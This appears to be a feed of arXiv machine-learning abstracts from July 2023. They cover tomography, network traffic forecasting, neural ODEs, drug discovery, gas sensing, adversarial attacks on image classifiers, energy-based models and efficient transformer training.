    In X-ray Computed Tomography (CT), projections from many angles are acquired and used for 3D reconstruction. To make CT suitable for in-line quality control, reducing the number of angles while maintaining reconstruction quality is necessary. Sparse-angle tomography is a popular approach for obtaining 3D reconstructions from limited data. To optimize its performance, one can adapt scan angles sequentially to select the most informative angles for each scanned object. Mathematically, this corresponds to solving an optimal experimental design (OED) problem. OED problems are high-dimensional, non-convex, bi-level optimization problems that cannot be solved online, i.e., during the scan. To address these challenges, we pose the OED problem as a partially observable Markov decision process in a Bayesian framework, and solve it through deep reinforcement learning. The approach learns efficient non-greedy policies to solve a given class of OED problems through extensive offline training rather than solving a given OED problem directly via numerical optimization. As such, the trained policy can successfully find the most informative scan angles online. We use a policy training method based on the Actor-Critic approach and evaluate its performance on 2D tomography with synthetic data.
    Multivariate Time Series characterization and forecasting of VoIP traffic in real mobile networks. (arXiv:2307.06645v1 [cs.NI])
    Predicting the behavior of real-time traffic (e.g., VoIP) in mobility scenarios could help the operators to better plan their network infrastructures and to optimize the allocation of resources. Accordingly, in this work the authors propose a forecasting analysis of crucial QoS/QoE descriptors (some of which are neglected in the technical literature) of VoIP traffic in a real mobile environment. The problem is formulated in terms of a multivariate time series analysis. Such a formalization allows us to discover and model the temporal relationships among various descriptors and to forecast their behaviors for future periods. Techniques such as Vector Autoregressive models and machine learning (deep-based and tree-based) approaches are employed and compared in terms of performance and time complexity, by reframing the multivariate time series problem into a supervised learning one. Moreover, a series of auxiliary analyses (stationarity, orthogonal impulse responses, etc.) are performed to discover the analytical structure of the time series and to provide deep insights about their relationships. The whole theoretical analysis has an experimental counterpart since a set of trials across a real-world LTE-Advanced environment has been performed to collect, post-process and analyze about 600,000 voice packets, organized per flow and differentiated per codec.
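The "reframing the multivariate time series problem into a supervised learning one" step amounts to building a lagged design matrix. A minimal sketch, sanity-checked on a noiseless VAR(1) system with made-up coefficients (not the paper's VoIP descriptors):

```python
import numpy as np

def make_supervised(series, n_lags):
    # Reframe a (T, k) multivariate series as a supervised problem:
    # row t of X holds the n_lags previous observations, y holds the next one
    T, _ = series.shape
    X = np.hstack([series[i : T - n_lags + i] for i in range(n_lags)])
    return X, series[n_lags:]

# Noiseless VAR(1) sanity check: y_t = A @ y_{t-1}
A = np.array([[0.5, 0.2], [-0.1, 0.3]])
y = np.empty((20, 2))
y[0] = [1.0, 1.0]
for t in range(1, 20):
    y[t] = A @ y[t - 1]

X, target = make_supervised(y, n_lags=1)
B, *_ = np.linalg.lstsq(X, target, rcond=None)   # row convention: B equals A.T
```

Once the series is in (X, y) form, any regressor (linear, tree-based, or deep) can be dropped in, which is how the paper compares VAR against machine learning approaches on a common footing.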
    Assessment of the suitability of degradation models for the planning of CCTV inspections of sewer pipes. (arXiv:2307.06341v1 [cs.LG])
    The degradation of sewer pipes poses significant economic, environmental and health concerns. The maintenance of such assets requires structured plans to perform inspections, which are more efficient when structural and environmental features are considered along with the results of previous inspection reports. The development of such plans requires degradation models that can be based on statistical and machine learning methods. This work proposes a methodology to assess their suitability to plan inspections considering three dimensions: accuracy metrics, ability to produce long-term degradation curves and explainability. Results suggest that although ensemble models yield the highest accuracy, they are unable to infer the long-term degradation of the pipes, whereas Logistic Regression offers a slightly less accurate model that is able to produce consistent degradation curves with high explainability. A use case is presented to demonstrate this methodology and the efficiency of model-based planning compared to the current inspection plan.
    Stochastic Delay Differential Games: Financial Modeling and Machine Learning Algorithms. (arXiv:2307.06450v1 [math.OC])
    In this paper, we propose a numerical methodology for finding the closed-loop Nash equilibrium of stochastic delay differential games through deep learning. These games are prevalent in finance and economics where multi-agent interaction and delayed effects are often desired features in a model, but are introduced at the expense of increased dimensionality of the problem. This increased dimensionality is especially significant as that arising from the number of players is coupled with the potential infinite dimensionality caused by the delay. Our approach involves parameterizing the controls of each player using distinct recurrent neural networks. These recurrent neural network-based controls are then trained using a modified version of Brown's fictitious play, incorporating deep learning techniques. To evaluate the effectiveness of our methodology, we test it on finance-related problems with known solutions. Furthermore, we also develop new problems and derive their analytical Nash equilibrium solutions, which serve as additional benchmarks for assessing the performance of our proposed deep learning approach.
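Brown's fictitious play, which the training procedure above adapts, is easiest to see in a finite matrix game: each player repeatedly best-responds to the opponent's empirical action frequencies. A minimal zero-sum sketch (the matching-pennies payoff is an illustrative example, unrelated to the paper's delay differential games):

```python
import numpy as np

def fictitious_play(payoff, n_iter=5000):
    # Two-player zero-sum matrix game: each player best-responds to the
    # opponent's empirical action frequencies (Brown's fictitious play)
    n, m = payoff.shape
    row_counts, col_counts = np.ones(n), np.ones(m)   # uniform initial beliefs
    for _ in range(n_iter):
        row_counts[np.argmax(payoff @ col_counts)] += 1   # row maximizes payoff
        col_counts[np.argmin(row_counts @ payoff)] += 1   # column minimizes it
    return row_counts / row_counts.sum(), col_counts / col_counts.sum()

# Matching pennies: the unique equilibrium is (1/2, 1/2) for both players
p, q = fictitious_play(np.array([[1.0, -1.0], [-1.0, 1.0]]))
```

In the paper's setting, the "best response" step is itself a stochastic control problem solved by training one player's recurrent-network control while the others are held fixed.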
    Trainability, Expressivity and Interpretability in Gated Neural ODEs. (arXiv:2307.06398v1 [cs.LG])
    Understanding how the dynamics in biological and artificial neural networks implement the computations required for a task is a salient open question in machine learning and neuroscience. In particular, computations requiring complex memory storage and retrieval pose a significant challenge for these networks to implement or learn. Recently, a family of models described by neural ordinary differential equations (nODEs) has emerged as powerful dynamical neural network models capable of capturing complex dynamics. Here, we extend nODEs by endowing them with adaptive timescales using gating interactions. We refer to these as gated neural ODEs (gnODEs). Using a task that requires memory of continuous quantities, we demonstrate the inductive bias of the gnODEs to learn (approximate) continuous attractors. We further show how reduced-dimensional gnODEs retain their modeling power while greatly improving interpretability, even allowing explicit visualization of the structure of learned attractors. We introduce a novel measure of expressivity which probes the capacity of a neural network to generate complex trajectories. Using this measure, we explore how the phase-space dimension of the nODEs and the complexity of the function modeling the flow field contribute to expressivity. We see that a more complex function for modeling the flow field allows a lower-dimensional nODE to capture a given target dynamics. Finally, we demonstrate the benefit of gating in nODEs on several real-world tasks.
    Artificial Intelligence for Drug Discovery: Are We There Yet?. (arXiv:2307.06521v1 [cs.AI])
    Drug discovery is adapting to novel technologies such as data science, informatics, and artificial intelligence (AI) to accelerate effective treatment development while reducing costs and animal experiments. AI is transforming drug discovery, as indicated by increasing interest from investors, industrial and academic scientists, and legislators. Successful drug discovery requires optimizing properties related to pharmacodynamics, pharmacokinetics, and clinical outcomes. This review discusses the use of AI in the three pillars of drug discovery: diseases, targets, and therapeutic modalities, with a focus on small molecule drugs. AI technologies, such as generative chemistry, machine learning, and multi-property optimization, have enabled several compounds to enter clinical trials. The scientific community must carefully vet known information to address the reproducibility crisis. The full potential of AI in drug discovery can only be realized with sufficient ground truth and appropriate human intervention at later pipeline stages.
    Metal Oxide-based Gas Sensor Array for the VOCs Analysis in Complex Mixtures using Machine Learning. (arXiv:2307.06556v1 [physics.app-ph])
    Detection of Volatile Organic Compounds (VOCs) from the breath is becoming a viable route for the early detection of diseases non-invasively. This paper presents a sensor array with three metal oxide electrodes that can use machine learning methods to identify four distinct VOCs in a mixture. The metal oxide sensor array was subjected to various VOC concentrations, including ethanol, acetone, toluene and chloroform. The dataset obtained from individual gases and their mixtures was analyzed using multiple machine learning algorithms, such as Random Forest (RF), K-Nearest Neighbor (KNN), Decision Tree, Linear Regression, Logistic Regression, Naive Bayes, Linear Discriminant Analysis, Artificial Neural Network, and Support Vector Machine. KNN and RF have shown more than 99% accuracy in classifying the varying chemicals in the gas mixtures. In regression analysis, KNN delivered the best results, with an R2 value of more than 0.99 and LODs of 0.012, 0.015, 0.014 and 0.025 PPM for predicting the concentrations of Acetone, Toluene, Ethanol, and Chloroform, respectively, in complex mixtures. Therefore, it is demonstrated that the array utilizing the provided algorithms can classify and predict the concentrations of the four gases simultaneously for disease diagnosis and treatment monitoring.
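The KNN regression used for concentration prediction is simple enough to sketch from scratch: each query's concentrations are predicted as the mean response of its k nearest training readings. All sensor values and concentrations below are made up for illustration, not the paper's data:

```python
import numpy as np

def knn_regress(X_train, y_train, X_query, k=3):
    # Predict each query's concentrations as the mean response of its
    # k nearest sensor readings (Euclidean distance, multi-output targets)
    d = np.linalg.norm(X_query[:, None, :] - X_train[None, :, :], axis=2)
    nearest = np.argsort(d, axis=1)[:, :k]
    return y_train[nearest].mean(axis=1)

# Toy data: 3 sensor channels -> concentrations of 4 gases (hypothetical values)
X = np.array([[0.1, 0.2, 0.3], [0.4, 0.1, 0.5], [0.9, 0.8, 0.2], [0.3, 0.7, 0.6]])
y = np.array([[1.0, 0.0, 0.0, 0.0], [0.0, 2.0, 0.0, 0.0],
              [0.0, 0.0, 3.0, 0.0], [0.0, 0.0, 0.0, 4.0]])
pred = knn_regress(X, y, X, k=1)   # k=1 on training points reproduces y
```

Because the targets are a vector of four concentrations, the same neighbor lookup predicts all gases simultaneously, matching the array's multi-gas use case.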
    Microbial Genetic Algorithm-based Black-box Attack against Interpretable Deep Learning Systems. (arXiv:2307.06496v1 [cs.CV])
    Deep learning models are susceptible to adversarial samples in white and black-box environments. Although previous studies have shown high attack success rates, coupling DNN models with interpretation models could offer a sense of security when a human expert is involved, who can identify whether a given sample is benign or malicious. However, in white-box environments, interpretable deep learning systems (IDLSes) have been shown to be vulnerable to malicious manipulations. In black-box settings, as access to the components of IDLSes is limited, it becomes more challenging for the adversary to fool the system. In this work, we propose a Query-efficient Score-based black-box attack against IDLSes, QuScore, which requires no knowledge of the target model and its coupled interpretation model. QuScore is based on transfer-based and score-based methods by employing an effective microbial genetic algorithm. Our method is designed to reduce the number of queries necessary to carry out successful attacks, resulting in a more efficient process. By continuously refining the adversarial samples created based on feedback scores from the IDLS, our approach effectively navigates the search space to identify perturbations that can fool the system. We evaluate the attack's effectiveness on four CNN models (Inception, ResNet, VGG, DenseNet) and two interpretation models (CAM, Grad), using both ImageNet and CIFAR datasets. Our results show that the proposed approach is query-efficient with a high attack success rate that can reach between 95% and 100% and transferability with an average success rate of 69% in the ImageNet and CIFAR datasets. Our attack method generates adversarial examples with attribution maps that resemble benign samples. We have also demonstrated that our attack is resilient against various preprocessing defense techniques and can easily be transferred to different DNN models.  ( 3 min )
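For readers unfamiliar with the microbial genetic algorithm the attack builds on, the sketch below shows its core tournament-and-infection loop on a toy bit-string objective. This is a generic illustration of the algorithm, not the paper's QuScore attack; all names and parameter values are illustrative.

```python
import random

def microbial_ga(fitness, genome_len=16, pop_size=20, steps=500, seed=0):
    """Microbial GA: pick two genomes at random; the loser copies genes from
    the winner (infection) and is mutated; the winner is left untouched."""
    rng = random.Random(seed)
    pop = [[rng.randint(0, 1) for _ in range(genome_len)] for _ in range(pop_size)]
    for _ in range(steps):
        a, b = rng.sample(range(pop_size), 2)
        win, lose = (a, b) if fitness(pop[a]) >= fitness(pop[b]) else (b, a)
        for i in range(genome_len):
            if rng.random() < 0.5:    # infection: copy the winner's gene
                pop[lose][i] = pop[win][i]
            if rng.random() < 0.05:   # mutation
                pop[lose][i] = 1 - pop[lose][i]
    return max(pop, key=fitness)

# Toy stand-in for the attack's feedback score: maximise the number of ones.
best = microbial_ga(sum)
```

In the attack setting, the "fitness" would be the feedback score returned by the target IDLS for a candidate perturbation.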
    Convergence of Message Passing Graph Neural Networks with Generic Aggregation On Large Random Graphs. (arXiv:2304.11140v2 [stat.ML] UPDATED)
    We study the convergence of message passing graph neural networks on random graph models to their continuous counterpart as the number of nodes tends to infinity. Until now, this convergence was only known for architectures with aggregation functions in the form of normalized means, or, equivalently, of an application of classical operators like the adjacency matrix or the graph Laplacian. We extend such results to a large class of aggregation functions, that encompasses all classically used message passing graph neural networks, such as attention-based message passing, max convolutional message passing or (degree-normalized) convolutional message passing. Under mild assumptions, we give non-asymptotic bounds with high probability to quantify this convergence. Our main result is based on the McDiarmid inequality. Interestingly, this result does not apply to the case where the aggregation is a coordinate-wise maximum. We treat this case separately and obtain a different convergence rate.
    Deep Network Approximation: Beyond ReLU to Diverse Activation Functions. (arXiv:2307.06555v1 [cs.LG])
    This paper explores the expressive power of deep neural networks for a diverse range of activation functions. An activation function set $\mathscr{A}$ is defined to encompass the majority of commonly used activation functions, such as $\mathtt{ReLU}$, $\mathtt{LeakyReLU}$, $\mathtt{ReLU}^2$, $\mathtt{ELU}$, $\mathtt{SELU}$, $\mathtt{Softplus}$, $\mathtt{GELU}$, $\mathtt{SiLU}$, $\mathtt{Swish}$, $\mathtt{Mish}$, $\mathtt{Sigmoid}$, $\mathtt{Tanh}$, $\mathtt{Arctan}$, $\mathtt{Softsign}$, $\mathtt{dSiLU}$, and $\mathtt{SRS}$. We demonstrate that for any activation function $\varrho\in \mathscr{A}$, a $\mathtt{ReLU}$ network of width $N$ and depth $L$ can be approximated to arbitrary precision by a $\varrho$-activated network of width $6N$ and depth $2L$ on any bounded set. This finding enables the extension of most approximation results achieved with $\mathtt{ReLU}$ networks to a wide variety of other activation functions, at the cost of slightly larger constants.  ( 2 min )
    Convolutional Neural Networks for Sentiment Analysis on Weibo Data: A Natural Language Processing Approach. (arXiv:2307.06540v1 [cs.CL])
    This study addressed the complex task of sentiment analysis on a dataset of 119,988 original tweets from Weibo using a Convolutional Neural Network (CNN), offering a new approach to Natural Language Processing (NLP). The data, sourced from Baidu's PaddlePaddle AI platform, were meticulously preprocessed, tokenized, and categorized based on sentiment labels. A CNN-based model was utilized, leveraging word embeddings for feature extraction, and trained to perform sentiment classification. The model achieved a macro-average F1-score of approximately 0.73 on the test set, showing balanced performance across positive, neutral, and negative sentiments. The findings underscore the effectiveness of CNNs for sentiment analysis tasks, with implications for practical applications in social media analysis, market research, and policy studies. The complete experimental content and code have been made publicly available on the Kaggle data platform for further research and development. Future work may involve exploring different architectures, such as Recurrent Neural Networks (RNN) or transformers, or using more complex pre-trained models like BERT, to further improve the model's ability to understand linguistic nuances and context.  ( 2 min )
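The feature-extraction core of such a CNN text classifier is a 1-D convolution over token embeddings followed by global max pooling. The toy sketch below shows that operation in pure Python; it is a pedagogical illustration, not the paper's model, and all names and the tiny example data are invented.

```python
def conv1d_maxpool(embeddings, kernel):
    """Slide a kernel over the token sequence and keep the strongest response
    (global max pooling), as in a CNN text classifier's feature extractor."""
    k = len(kernel)
    responses = []
    for start in range(len(embeddings) - k + 1):
        window = embeddings[start:start + k]
        # dot product between the flattened window and the kernel weights
        responses.append(sum(w * x for row, krow in zip(window, kernel)
                             for x, w in zip(row, krow)))
    return max(responses)

# 4 tokens with 2-dim embeddings; the kernel spans 2 consecutive tokens.
seq = [[1.0, 0.0], [0.0, 1.0], [1.0, 1.0], [0.0, 0.0]]
kernel = [[1.0, 0.0], [0.0, 1.0]]
feature = conv1d_maxpool(seq, kernel)  # strongest response is at tokens 0-1
```

A real model learns many such kernels of several widths and feeds the pooled features to a classifier layer.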
    Introducing Foundation Models as Surrogate Models: Advancing Towards More Practical Adversarial Attacks. (arXiv:2307.06608v1 [cs.LG])
Recently, the no-box adversarial attack, in which the attacker lacks access to the model's architecture, weights, and training data, has become the most practical and challenging attack setup. However, the potential and flexibility inherent in the surrogate model selection process in the no-box setting remain underexplored. Inspired by the burgeoning interest in utilizing foundational models to address downstream tasks, this paper adopts an innovative idea: 1) recasting the adversarial attack as a downstream task, specifically image noise generation, and 2) introducing foundational models as surrogate models. Harnessing the concept of non-robust features, we elaborate on two guiding principles for surrogate model selection to explain why foundational models are an optimal choice for this role. Paradoxically, however, we observe that these foundational models underperform. Analyzing this unexpected behavior in the feature space, we attribute the lackluster performance of foundational models (e.g., CLIP) to their significant representational capacity and, conversely, their lack of discriminative prowess. To mitigate this issue, we propose a margin-based loss strategy for fine-tuning foundational models on target images. The experimental results verify that our approach, which employs the basic Fast Gradient Sign Method (FGSM) attack algorithm, outstrips the performance of other, more convoluted algorithms. We conclude by advocating that the research community consider surrogate models as crucial determinants of the effectiveness of adversarial attacks in no-box settings. The implications of our work bear relevance for improving the efficacy of such adversarial attacks and the overall robustness of AI systems.  ( 3 min )
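The FGSM step mentioned above perturbs the input by a fixed budget in the direction of the sign of the input gradient of the loss. The sketch below applies it to a logistic regression model, where the gradient is available in closed form; this is the generic FGSM recipe, not the paper's surrogate-model pipeline, and the toy weights and inputs are invented.

```python
import math

def fgsm(x, y, w, eps):
    """FGSM on logistic regression: p(y=+1|x) = sigmoid(w . x), label y in {-1, +1}.
    Perturb x by eps in the sign of d(loss)/dx."""
    margin = y * sum(wi * xi for wi, xi in zip(w, x))
    sigma = 1.0 / (1.0 + math.exp(-margin))
    grad = [-y * (1.0 - sigma) * wi for wi in w]   # analytic input gradient
    sign = lambda g: (g > 0) - (g < 0)
    return [xi + eps * sign(gi) for xi, gi in zip(x, grad)]

w = [2.0, -1.0]
x = [1.0, 0.5]
score_before = sum(wi * xi for wi, xi in zip(w, x))      # positive: classified +1
x_adv = fgsm(x, +1, w, eps=1.0)
score_after = sum(wi * xi for wi, xi in zip(w, x_adv))   # pushed toward the other class
```

With a deep surrogate model, `grad` would come from backpropagation rather than a closed form, but the update rule is identical.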
    Equalization in Dispersion-Managed Systems Using Learned Digital Back-Propagation. (arXiv:2307.06821v1 [cs.NI])
    In this paper, we investigate the use of the learned digital back-propagation (LDBP) for equalizing dual-polarization fiber-optic transmission in dispersion-managed (DM) links. LDBP is a deep neural network that optimizes the parameters of DBP using the stochastic gradient descent. We evaluate DBP and LDBP in a simulated WDM dual-polarization fiber transmission system operating at the bitrate of 256 Gbit/s per channel, with a dispersion map designed for a 2016 km link with 15% residual dispersion. Our results show that in single-channel transmission, LDBP achieves an effective signal-to-noise ratio improvement of 6.3 dB and 2.5 dB, respectively, over linear equalization and DBP. In WDM transmission, the corresponding $Q$-factor gains are 1.1 dB and 0.4 dB, respectively. Additionally, we conduct a complexity analysis, which reveals that a frequency-domain implementation of LDBP and DBP is more favorable in terms of complexity than the time-domain implementation. These findings demonstrate the effectiveness of LDBP in mitigating the nonlinear effects in DM fiber-optic transmission systems.
    Misclassification in Automated Content Analysis Causes Bias in Regression. Can We Fix It? Yes We Can!. (arXiv:2307.06483v1 [cs.LG])
    Automated classifiers (ACs), often built via supervised machine learning (SML), can categorize large, statistically powerful samples of data ranging from text to images and video, and have become widely popular measurement devices in communication science and related fields. Despite this popularity, even highly accurate classifiers make errors that cause misclassification bias and misleading results in downstream analyses-unless such analyses account for these errors. As we show in a systematic literature review of SML applications, communication scholars largely ignore misclassification bias. In principle, existing statistical methods can use "gold standard" validation data, such as that created by human annotators, to correct misclassification bias and produce consistent estimates. We introduce and test such methods, including a new method we design and implement in the R package misclassificationmodels, via Monte Carlo simulations designed to reveal each method's limitations, which we also release. Based on our results, we recommend our new error correction method as it is versatile and efficient. In sum, automated classifiers, even those below common accuracy standards or making systematic misclassifications, can be useful for measurement with careful study design and appropriate error correction methods.
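As a toy illustration of the correction idea (not the paper's regression-level method, and with an invented function name), the classic Rogan-Gladen estimator recovers a true class prevalence from an imperfect classifier's output, given sensitivity and specificity measured on gold-standard validation data:

```python
def corrected_prevalence(observed_rate, sensitivity, specificity):
    """Rogan-Gladen correction: recover the true prevalence from the rate
    reported by an imperfect classifier, using its sensitivity/specificity
    as measured against gold-standard (e.g., human-annotated) data."""
    return (observed_rate + specificity - 1.0) / (sensitivity + specificity - 1.0)

# True prevalence 0.30 seen through a classifier with sens=0.8, spec=0.9:
# observed = 0.30 * 0.8 + 0.70 * (1 - 0.9) = 0.31
pi_hat = corrected_prevalence(0.31, sensitivity=0.8, specificity=0.9)  # recovers 0.30
```

The paper's methods extend this principle from a single proportion to regression coefficients estimated on classifier outputs.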
    Energy Discrepancies: A Score-Independent Loss for Energy-Based Models. (arXiv:2307.06431v1 [stat.ML])
    Energy-based models are a simple yet powerful class of probabilistic models, but their widespread adoption has been limited by the computational burden of training them. We propose a novel loss function called Energy Discrepancy (ED) which does not rely on the computation of scores or expensive Markov chain Monte Carlo. We show that ED approaches the explicit score matching and negative log-likelihood loss under different limits, effectively interpolating between both. Consequently, minimum ED estimation overcomes the problem of nearsightedness encountered in score-based estimation methods, while also enjoying theoretical guarantees. Through numerical experiments, we demonstrate that ED learns low-dimensional data distributions faster and more accurately than explicit score matching or contrastive divergence. For high-dimensional image data, we describe how the manifold hypothesis puts limitations on our approach and demonstrate the effectiveness of energy discrepancy by training the energy-based model as a prior of a variational decoder model.  ( 2 min )
    Leveraging Contextual Counterfactuals Toward Belief Calibration. (arXiv:2307.06513v1 [cs.AI])
    Beliefs and values are increasingly being incorporated into our AI systems through alignment processes, such as carefully curating data collection principles or regularizing the loss function used for training. However, the meta-alignment problem is that these human beliefs are diverse and not aligned across populations; furthermore, the implicit strength of each belief may not be well calibrated even among humans, especially when trying to generalize across contexts. Specifically, in high regret situations, we observe that contextual counterfactuals and recourse costs are particularly important in updating a decision maker's beliefs and the strengths to which such beliefs are held. Therefore, we argue that including counterfactuals is key to an accurate calibration of beliefs during alignment. To do this, we first segment belief diversity into two categories: subjectivity (across individuals within a population) and epistemic uncertainty (within an individual across different contexts). By leveraging our notion of epistemic uncertainty, we introduce `the belief calibration cycle' framework to more holistically calibrate this diversity of beliefs with context-driven counterfactual reasoning by using a multi-objective optimization. We empirically apply our framework for finding a Pareto frontier of clustered optimal belief strengths that generalize across different contexts, demonstrating its efficacy on a toy dataset for credit decisions.
    On the Effective Horizon of Inverse Reinforcement Learning. (arXiv:2307.06541v1 [cs.LG])
    Inverse reinforcement learning (IRL) algorithms often rely on (forward) reinforcement learning or planning over a given time horizon to compute an approximately optimal policy for a hypothesized reward function and then match this policy with expert demonstrations. The time horizon plays a critical role in determining both the accuracy of reward estimate and the computational efficiency of IRL algorithms. Interestingly, an effective time horizon shorter than the ground-truth value often produces better results faster. This work formally analyzes this phenomenon and provides an explanation: the time horizon controls the complexity of an induced policy class and mitigates overfitting with limited data. This analysis leads to a principled choice of the effective horizon for IRL. It also prompts us to reexamine the classic IRL formulation: it is more natural to learn jointly the reward and the effective horizon together rather than the reward alone with a given horizon. Our experimental results confirm the theoretical analysis.  ( 2 min )
    Online Distributed Learning with Quantized Finite-Time Coordination. (arXiv:2307.06620v1 [cs.LG])
    In this paper we consider online distributed learning problems. Online distributed learning refers to the process of training learning models on distributed data sources. In our setting a set of agents need to cooperatively train a learning model from streaming data. Differently from federated learning, the proposed approach does not rely on a central server but only on peer-to-peer communications among the agents. This approach is often used in scenarios where data cannot be moved to a centralized location due to privacy, security, or cost reasons. In order to overcome the absence of a central server, we propose a distributed algorithm that relies on a quantized, finite-time coordination protocol to aggregate the locally trained models. Furthermore, our algorithm allows for the use of stochastic gradients during local training. Stochastic gradients are computed using a randomly sampled subset of the local training data, which makes the proposed algorithm more efficient and scalable than traditional gradient descent. In our paper, we analyze the performance of the proposed algorithm in terms of the mean distance from the online solution. Finally, we present numerical results for a logistic regression task.  ( 2 min )
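A minimal sketch of the quantized peer-to-peer averaging idea, assuming a fixed ring topology and round-to-one-decimal quantization (both invented for illustration; the paper's finite-time coordination protocol is more sophisticated):

```python
def quantized_consensus(values, rounds=30, step=0.5):
    """Toy peer-to-peer averaging on a ring: each agent nudges its value toward
    its neighbours' values, but only sees them quantized to 1 decimal place."""
    n = len(values)
    x = list(values)
    for _ in range(rounds):
        q = [round(v, 1) for v in x]               # quantized messages
        x = [xi + step * ((q[(i - 1) % n] + q[(i + 1) % n]) / 2 - q[i])
             for i, xi in enumerate(x)]
    return x

# Four agents' local "model parameters" converge near the global mean (6.0)
# without any central server, up to quantization error.
models = quantized_consensus([0.0, 4.0, 8.0, 12.0])
spread = max(models) - min(models)
```

Because each quantized message is added and subtracted symmetrically, the sum of the values is preserved, so the agents agree on (approximately) the global average.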
    Deep Neural Networks for Semiparametric Frailty Models via H-likelihood. (arXiv:2307.06581v1 [stat.ML])
    For prediction of clustered time-to-event data, we propose a new deep neural network based gamma frailty model (DNN-FM). An advantage of the proposed model is that the joint maximization of the new h-likelihood provides maximum likelihood estimators for fixed parameters and best unbiased predictors for random frailties. Thus, the proposed DNN-FM is trained by using a negative profiled h-likelihood as a loss function, constructed by profiling out the non-parametric baseline hazard. Experimental studies show that the proposed method enhances the prediction performance of the existing methods. A real data analysis shows that the inclusion of subject-specific frailties helps to improve prediction of the DNN based Cox model (DNN-Cox).  ( 2 min )
    Prescriptive Process Monitoring Under Resource Constraints: A Reinforcement Learning Approach. (arXiv:2307.06564v1 [cs.AI])
Prescriptive process monitoring methods seek to optimize the performance of business processes by triggering interventions at runtime, thereby increasing the probability of positive case outcomes. These interventions are triggered according to an intervention policy. Reinforcement learning has been put forward as an approach to learning intervention policies through trial and error. Existing approaches in this space assume that the number of resources available to perform interventions in a process is unlimited, an unrealistic assumption in practice. This paper argues that, in the presence of resource constraints, a key dilemma in the field of prescriptive process monitoring is to trigger interventions based not only on predictions of their necessity, timeliness, or effect but also on the uncertainty of these predictions and the level of resource utilization. Indeed, committing scarce resources to an intervention when the necessity or effects of this intervention are highly uncertain may intuitively lead to suboptimal intervention effects. Accordingly, the paper proposes a reinforcement learning approach for prescriptive process monitoring that leverages conformal prediction techniques to consider the uncertainty of the predictions upon which an intervention decision is based. An evaluation using real-life datasets demonstrates that explicitly modeling uncertainty using conformal predictions helps reinforcement learning agents converge towards policies with higher net intervention gain.  ( 2 min )
    No Train No Gain: Revisiting Efficient Training Algorithms For Transformer-based Language Models. (arXiv:2307.06440v1 [cs.LG])
    The computation necessary for training Transformer-based language models has skyrocketed in recent years. This trend has motivated research on efficient training algorithms designed to improve training, validation, and downstream performance faster than standard training. In this work, we revisit three categories of such algorithms: dynamic architectures (layer stacking, layer dropping), batch selection (selective backprop, RHO loss), and efficient optimizers (Lion, Sophia). When pre-training BERT and T5 with a fixed computation budget using such methods, we find that their training, validation, and downstream gains vanish compared to a baseline with a fully-decayed learning rate. We define an evaluation protocol that enables computation to be done on arbitrary machines by mapping all computation time to a reference machine which we call reference system time. We discuss the limitations of our proposed protocol and release our code to encourage rigorous research in efficient training procedures: https://github.com/JeanKaddour/NoTrainNoGain.  ( 2 min )
    Tensor Decompositions Meet Control Theory: Learning General Mixtures of Linear Dynamical Systems. (arXiv:2307.06538v1 [cs.LG])
    Recently Chen and Poor initiated the study of learning mixtures of linear dynamical systems. While linear dynamical systems already have wide-ranging applications in modeling time-series data, using mixture models can lead to a better fit or even a richer understanding of underlying subpopulations represented in the data. In this work we give a new approach to learning mixtures of linear dynamical systems that is based on tensor decompositions. As a result, our algorithm succeeds without strong separation conditions on the components, and can be used to compete with the Bayes optimal clustering of the trajectories. Moreover our algorithm works in the challenging partially-observed setting. Our starting point is the simple but powerful observation that the classic Ho-Kalman algorithm is a close relative of modern tensor decomposition methods for learning latent variable models. This gives us a playbook for how to extend it to work with more complicated generative models.  ( 2 min )
    DSV: An Alignment Validation Loss for Self-supervised Outlier Model Selection. (arXiv:2307.06534v1 [cs.LG])
    Self-supervised learning (SSL) has proven effective in solving various problems by generating internal supervisory signals. Unsupervised anomaly detection, which faces the high cost of obtaining true labels, is an area that can greatly benefit from SSL. However, recent literature suggests that tuning the hyperparameters (HP) of data augmentation functions is crucial to the success of SSL-based anomaly detection (SSAD), yet a systematic method for doing so remains unknown. In this work, we propose DSV (Discordance and Separability Validation), an unsupervised validation loss to select high-performing detection models with effective augmentation HPs. DSV captures the alignment between an augmentation function and the anomaly-generating mechanism with surrogate losses, which approximate the discordance and separability of test data, respectively. As a result, the evaluation via DSV leads to selecting an effective SSAD model exhibiting better alignment, which results in high detection accuracy. We theoretically derive the degree of approximation conducted by the surrogate losses and empirically show that DSV outperforms a wide range of baselines on 21 real-world tasks.  ( 2 min )
    Ageing Analysis of Embedded SRAM on a Large-Scale Testbed Using Machine Learning. (arXiv:2307.06693v1 [cs.AR])
    Ageing detection and failure prediction are essential in many Internet of Things (IoT) deployments, which operate huge quantities of embedded devices unattended in the field for years. In this paper, we present a large-scale empirical analysis of natural SRAM wear-out using 154 boards from a general-purpose testbed. Starting from SRAM initialization bias, which each node can easily collect at startup, we apply various metrics for feature extraction and experiment with common machine learning methods to predict the age of operation for this node. Our findings indicate that even though ageing impacts are subtle, our indicators can well estimate usage times with an $R^2$ score of 0.77 and a mean error of 24% using regressors, and with an F1 score above 0.6 for classifiers applying a six-months resolution.
    IntelliGraphs: Datasets for Benchmarking Knowledge Graph Generation. (arXiv:2307.06698v1 [cs.AI])
    Knowledge Graph Embedding (KGE) models are used to learn continuous representations of entities and relations. A key task in the literature is predicting missing links between entities. However, Knowledge Graphs are not just sets of links but also have semantics underlying their structure. Semantics is crucial in several downstream tasks, such as query answering or reasoning. We introduce the subgraph inference task, where a model has to generate likely and semantically valid subgraphs. We propose IntelliGraphs, a set of five new Knowledge Graph datasets. The IntelliGraphs datasets contain subgraphs with semantics expressed in logical rules for evaluating subgraph inference. We also present the dataset generator that produced the synthetic datasets. We designed four novel baseline models, which include three models based on traditional KGEs. We evaluate their expressiveness and show that these models cannot capture the semantics. We believe this benchmark will encourage the development of machine learning models that emphasize semantic understanding.
    Bregman Deviations of Generic Exponential Families. (arXiv:2201.07306v4 [cs.LG] UPDATED)
    We revisit the method of mixture technique, also known as the Laplace method, to study the concentration phenomenon in generic exponential families. Combining the properties of Bregman divergence associated with log-partition function of the family with the method of mixtures for super-martingales, we establish a generic bound controlling the Bregman divergence between the parameter of the family and a finite sample estimate of the parameter. Our bound is time-uniform and makes appear a quantity extending the classical information gain to exponential families, which we call the Bregman information gain. For the practitioner, we instantiate this novel bound to several classical families, e.g., Gaussian, Bernoulli, Exponential, Weibull, Pareto, Poisson and Chi-square yielding explicit forms of the confidence sets and the Bregman information gain. We further numerically compare the resulting confidence bounds to state-of-the-art alternatives for time-uniform concentration and show that this novel method yields competitive results. Finally, we highlight the benefit of our concentration bounds on some illustrative applications.
